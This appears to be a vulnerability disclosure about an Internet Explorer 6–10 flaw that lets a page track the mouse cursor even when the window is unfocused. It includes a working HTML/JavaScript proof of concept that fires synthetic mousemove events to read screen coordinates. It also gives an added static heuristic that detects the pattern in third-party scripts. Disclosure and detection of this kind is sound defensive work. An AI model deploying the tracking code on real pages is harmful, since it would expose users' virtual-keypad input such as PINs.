A security vulnerability in Internet Explorer, versions 6–10, allows your mouse cursor to be tracked anywhere on the screen, even if the Internet Explorer window is inactive, unfocused or minimised. The vulnerability is notable because it compromises the security of virtual keyboards and virtual keypads.
Affected properties of the Event object are altKey, altLeft, clientX, clientY, ctrlKey, ctrlLeft, offsetX, offsetY, screenX, screenY, shiftKey, shiftLeft, x and y.
Exploit
-------
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Exploit Demo</title>
<script type="text/javascript">
window.attachEvent("onload", function() {
  var detector = document.getElementById("detector");
  // The handler reads screen coordinates from whatever event object it receives.
  detector.attachEvent("onmousemove", function (e) {
    detector.innerHTML = e.screenX + ", " + e.screenY;
  });
  // Fire a synthetic mousemove every 100 ms; affected IE versions populate
  // the event object with the real cursor position.
  setInterval(function () {
    detector.fireEvent("onmousemove");
  }, 100);
});
</script>
</head>
<body>
<div id="detector"></div>
</body>
</html>
The link below shows a demo of the vulnerability.
http://iedataleak.spider.io/demo
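
For reviewing third-party scripts (ad tags, widgets) for this pattern, the following static heuristic is an added example, not code from the original page or from the researchers. It flags a script that fires a synthetic event with `fireEvent`, attaches a handler for that same event, and reads one of the affected Event properties listed above; the function name and both sample inputs are constructed for illustration.

```javascript
// Added example: static triage heuristic for the pattern shown in the demo.
// Property list taken from the page; everything else is hypothetical naming.
const AFFECTED = ["altKey", "altLeft", "clientX", "clientY", "ctrlKey", "ctrlLeft",
  "offsetX", "offsetY", "screenX", "screenY", "shiftKey", "shiftLeft", "x", "y"];

function scanForSyntheticEventLeak(source) {
  // fireEvent("onXXX") with one argument: a synthetic event with no
  // caller-supplied event object, so the browser fills in the fields.
  const fireRe = /\.fireEvent\(\s*["'](on\w+)["']\s*\)/g;
  const propRe = new RegExp("\\.(" + AFFECTED.join("|") + ")\\b", "g");

  const fired = [...new Set([...source.matchAll(fireRe)].map(m => m[1].toLowerCase()))];
  const propertiesRead = [...new Set([...source.matchAll(propRe)].map(m => m[1]))];

  // Keep only fired events that the same script also attaches a handler for.
  const firedEvents = fired.filter(ev =>
    new RegExp("attachEvent\\(\\s*[\"']" + ev + "[\"']", "i").test(source));

  // Timer-driven firing means the script is polling rather than reacting to input.
  const polled = /\bset(Interval|Timeout)\s*\(/.test(source);

  return {
    suspicious: firedEvents.length > 0 && propertiesRead.length > 0,
    polled,
    firedEvents,
    propertiesRead
  };
}

// Constructed sample 1: the script body of the demo on this page.
const DEMO_SCRIPT = [
  'window.attachEvent("onload", function() {',
  '  var detector = document.getElementById("detector");',
  '  detector.attachEvent("onmousemove", function (e) {',
  '    detector.innerHTML = e.screenX + ", " + e.screenY;',
  '  });',
  '  setInterval(function () { detector.fireEvent("onmousemove"); }, 100);',
  '});'
].join("\n");

// Constructed sample 2: an ordinary handler that only reacts to real mouse input.
const BENIGN_SCRIPT =
  'el.attachEvent("onmousemove", function (e) { tip.style.left = e.clientX + "px"; });';

console.log(scanForSyntheticEventLeak(DEMO_SCRIPT));
console.log(scanForSyntheticEventLeak(BENIGN_SCRIPT));
```

This is a triage aid for readable source only: minified or obfuscated scripts that build the event name or property name at run time will not match.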